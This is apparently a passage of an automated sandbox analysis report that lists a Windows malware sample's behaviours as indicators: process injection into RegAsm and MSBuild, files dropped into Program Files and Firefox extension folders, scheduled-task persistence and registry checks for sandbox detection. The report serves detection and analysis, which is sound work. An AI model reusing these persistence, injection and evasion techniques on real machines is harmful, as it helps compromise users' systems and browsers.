pid Process 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 5056 JJECAAEHCF.exe 4208 explorti.exe 4824 67f535e337.exe 5224 explorti.exe 3512 explorti.exe 5528 explorti.exe 3480 explorti.exe 5692 explorti.exe 5240 explorti.exe 6004 explorti.exe 5308 explorti.exe 1548 explorti.exe 5448 4Iy1KUXaumS5KWIhCg2YizTi.exe 5448 4Iy1KUXaumS5KWIhCg2YizTi.exe 1892 explorti.exe 1304 explorti.exe 1848 explorti.exe 4896 explorti.exe 976 explorti.exe 2016 explorti.exe 6036 explorti.exe 6016 explorti.exe 4948 explorti.exe 2836 explorti.exe 5324 explorti.exe 3324 explorti.exe 4912 explorti.exe 5076 explorti.exe 3876 explorti.exe 2924 explorti.exe 1064 explorti.exe 5840 explorti.exe 480 explorti.exe 1564 explorti.exe 5764 explorti.exe 5732 explorti.exe 6036 explorti.exe 3400 explorti.exe 2760 explorti.exe 5608 explorti.exe 5368 explorti.exe 3404 explorti.exe 868 explorti.exe 648 explorti.exe 3656 explorti.exe -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 2848 set thread context of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2324 set thread context of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 1916 set thread context of 2124 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 107 PID 564 set thread context of 772 564 5XopSKg9PUSZohSIWN2v9xOT.exe 108 PID 1096 set thread context of 3736 1096 dz_LhQg5VnMy0wlI_6dK0bLe.exe 128 PID 1472 set thread context of 3056 1472 eqtpkqwqodik.exe 159 PID 1472 set thread context of 1448 1472 eqtpkqwqodik.exe 161 PID 5756 set thread context of 5864 5756 BFCFBFBFBK.exe 244 PID 6004 set thread context of 6040 6004 KFIJJJEBGC.exe 246 PID 3580 set thread context of 1496 3580 abQaeBLwmX9V57tLKTE3eOuX.exe 475 PID 5832 set thread context of 2236 5832 kJjL0w6C70s0bwCeRI5o95qa.exe 476 PID 2364 set thread context of 3020 2364 sxM96ISlNbOtGCb6tmhTPqMM.exe 477 PID 6048 set thread context of 2956 6048 7NybowgkTtFNZ6zV5tAShfiu.exe 478 PID 5504 set thread context of 1612 5504 cRS5O_os57KVEKl2I6n_mlOZ.exe 480 -
Drops file in Program Files directory 26 IoCs
description ioc Process File created C:\Program Files (x86)\RmqlacUQU\DhfJYe.dll OklvlTo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak OklvlTo.exe File created C:\Program Files (x86)\XYcGyWaqnbhU2\jYoplUh.xml OklvlTo.exe File created C:\Program Files (x86)\qioMUrUoKCErC\uXNJzhu.xml OklvlTo.exe File created C:\Program Files (x86)\IFfyxFxqzCUn\jmDFIQL.dll OklvlTo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak OklvlTo.exe File created C:\Program Files (x86)\qioMUrUoKCErC\ljPXgIk.dll OklvlTo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi AXChDNl.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja AXChDNl.exe File created C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\nUdthBM.xml AXChDNl.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja OklvlTo.exe File created C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\pXidBiU.dll OklvlTo.exe File created C:\Program Files (x86)\nXmjFVOHU\CUgSrT.dll AXChDNl.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi AXChDNl.exe File created C:\Program Files (x86)\utOkvPMviNUn\TfUqMOF.dll AXChDNl.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi OklvlTo.exe File created C:\Program Files (x86)\ANKVsfPAuVEU2\KCIUBgQSlrRTq.dll AXChDNl.exe File created C:\Program Files (x86)\tuyZfYaPCcjxC\peMRHIb.dll AXChDNl.exe File created C:\Program Files (x86)\RmqlacUQU\QCNqlOa.xml OklvlTo.exe File created C:\Program Files (x86)\XYcGyWaqnbhU2\uDthzfaJGYZeg.dll OklvlTo.exe File created C:\Program Files (x86)\ANKVsfPAuVEU2\IGnJJps.xml AXChDNl.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi OklvlTo.exe File created C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\ZcvXHny.xml OklvlTo.exe File created C:\Program Files (x86)\nXmjFVOHU\tKdeIZH.xml AXChDNl.exe File created C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\ARZbTyR.dll AXChDNl.exe File created C:\Program Files (x86)\tuyZfYaPCcjxC\mOuiFMl.xml AXChDNl.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\Tasks\fxxmGIjnSbKlnnNZc.job schtasks.exe File created C:\Windows\Tasks\ZNzITvxeQRflwsDJD.job schtasks.exe File created C:\Windows\Tasks\JHXYugTugXnbcjp.job schtasks.exe File created C:\Windows\Tasks\bIOEZkRAagKtMyjtNl.job schtasks.exe File created C:\Windows\Tasks\beIeSqxTUIgkrqSZzo.job schtasks.exe File created C:\Windows\Tasks\explorti.job JJECAAEHCF.exe File created C:\Windows\Tasks\LOHPKuWKJcOzSYPZu.job schtasks.exe File created C:\Windows\Tasks\ayCOowYLgjutNKI.job schtasks.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5480 sc.exe 4288 sc.exe 4880 sc.exe 3416 sc.exe 3996 sc.exe 2348 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 5456 5204 WerFault.exe 180 2008 5180 WerFault.exe 179 2364 5104 WerFault.exe 111 664 6072 WerFault.exe 263 2284 1492 WerFault.exe 112 2044 648 WerFault.exe 360 -
Checks processor information in registry 2 TTPs 36 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 QwpLixYOI92BLmCZFEhE6Mbs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString QwpLixYOI92BLmCZFEhE6Mbs.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3600 timeout.exe 1984 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OklvlTo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" AXChDNl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" OklvlTo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" AXChDNl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b1167767-0000-0000-0000-d01200000000}\MaxCapacity = "14116" OklvlTo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" AXChDNl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5224 schtasks.exe 3656 schtasks.exe 4972 schtasks.exe 4092 schtasks.exe 1072 schtasks.exe 4552 schtasks.exe 2252 schtasks.exe 3552 schtasks.exe 5152 schtasks.exe 3156 schtasks.exe 5292 schtasks.exe 5568 schtasks.exe 1212 schtasks.exe 1156 schtasks.exe 1376 schtasks.exe 2640 schtasks.exe 5996 schtasks.exe 2304 schtasks.exe 2036 schtasks.exe 5216 schtasks.exe 560 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1184 Setup.exe 1184 Setup.exe 1784 Setup.exe 1784 Setup.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3656 MSBuild.exe 3656 MSBuild.exe 4208 powershell.exe 772 RegAsm.exe 4468 RegAsm.exe 4468 RegAsm.exe 4468 RegAsm.exe 4468 RegAsm.exe 4208 powershell.exe 236 powershell.exe 236 powershell.exe 236 powershell.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 3656 MSBuild.exe 3656 MSBuild.exe 5056 JJECAAEHCF.exe 5056 JJECAAEHCF.exe 4468 RegAsm.exe 4208 explorti.exe 4208 explorti.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 1472 eqtpkqwqodik.exe 3656 MSBuild.exe 3656 MSBuild.exe 3656 MSBuild.exe 3656 MSBuild.exe 2124 MSBuild.exe 2124 MSBuild.exe 2124 MSBuild.exe 2124 MSBuild.exe 5224 explorti.exe 5224 explorti.exe 5372 powershell.exe 5372 powershell.exe 5372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1916 cFb2c7uKqYcOaECU8XsTAIef.exe Token: SeDebugPrivilege 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe Token: SeDebugPrivilege 772 RegAsm.exe Token: SeBackupPrivilege 772 RegAsm.exe Token: SeSecurityPrivilege 772 RegAsm.exe Token: SeSecurityPrivilege 772 RegAsm.exe Token: SeSecurityPrivilege 772 RegAsm.exe Token: SeSecurityPrivilege 772 RegAsm.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 WMIC.exe Token: SeSecurityPrivilege 1496 WMIC.exe Token: SeTakeOwnershipPrivilege 1496 WMIC.exe Token: SeLoadDriverPrivilege 1496 WMIC.exe Token: SeSystemProfilePrivilege 1496 WMIC.exe Token: SeSystemtimePrivilege 1496 WMIC.exe Token: SeProfSingleProcessPrivilege 1496 WMIC.exe Token: SeIncBasePriorityPrivilege 1496 WMIC.exe Token: SeCreatePagefilePrivilege 1496 WMIC.exe Token: SeBackupPrivilege 1496 WMIC.exe Token: SeRestorePrivilege 1496 WMIC.exe Token: SeShutdownPrivilege 1496 WMIC.exe Token: SeDebugPrivilege 1496 WMIC.exe Token: SeSystemEnvironmentPrivilege 1496 WMIC.exe Token: SeRemoteShutdownPrivilege 1496 WMIC.exe Token: SeUndockPrivilege 1496 WMIC.exe Token: SeManageVolumePrivilege 1496 WMIC.exe Token: 33 1496 WMIC.exe Token: 34 1496 WMIC.exe Token: 35 1496 WMIC.exe Token: 36 1496 WMIC.exe Token: SeDebugPrivilege 236 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 WMIC.exe Token: SeSecurityPrivilege 1496 WMIC.exe Token: SeTakeOwnershipPrivilege 1496 WMIC.exe Token: SeLoadDriverPrivilege 1496 WMIC.exe Token: SeSystemProfilePrivilege 1496 WMIC.exe Token: SeSystemtimePrivilege 1496 WMIC.exe Token: SeProfSingleProcessPrivilege 1496 WMIC.exe Token: SeIncBasePriorityPrivilege 1496 WMIC.exe Token: SeCreatePagefilePrivilege 1496 WMIC.exe Token: SeBackupPrivilege 1496 WMIC.exe Token: SeRestorePrivilege 1496 WMIC.exe Token: SeShutdownPrivilege 1496 WMIC.exe Token: SeDebugPrivilege 1496 WMIC.exe Token: SeSystemEnvironmentPrivilege 1496 WMIC.exe Token: SeRemoteShutdownPrivilege 1496 WMIC.exe Token: SeUndockPrivilege 1496 WMIC.exe Token: SeManageVolumePrivilege 1496 WMIC.exe Token: 33 1496 WMIC.exe Token: 34 1496 WMIC.exe Token: 35 1496 WMIC.exe Token: 36 1496 WMIC.exe Token: SeIncreaseQuotaPrivilege 4952 WMIC.exe Token: SeSecurityPrivilege 4952 WMIC.exe Token: SeTakeOwnershipPrivilege 4952 WMIC.exe Token: SeLoadDriverPrivilege 4952 WMIC.exe Token: SeSystemProfilePrivilege 4952 WMIC.exe Token: SeSystemtimePrivilege 4952 WMIC.exe Token: SeProfSingleProcessPrivilege 4952 WMIC.exe Token: SeIncBasePriorityPrivilege 4952 WMIC.exe Token: SeCreatePagefilePrivilege 4952 WMIC.exe Token: SeBackupPrivilege 4952 WMIC.exe Token: SeRestorePrivilege 4952 WMIC.exe Token: SeShutdownPrivilege 4952 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 200 Klk_ndJuZUINtD72UfY7IaBv.tmp 5056 JJECAAEHCF.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 2212 b9fcde3053.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 1744 firefox.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe -
Suspicious use of SetWindowsHookEx 47 IoCs
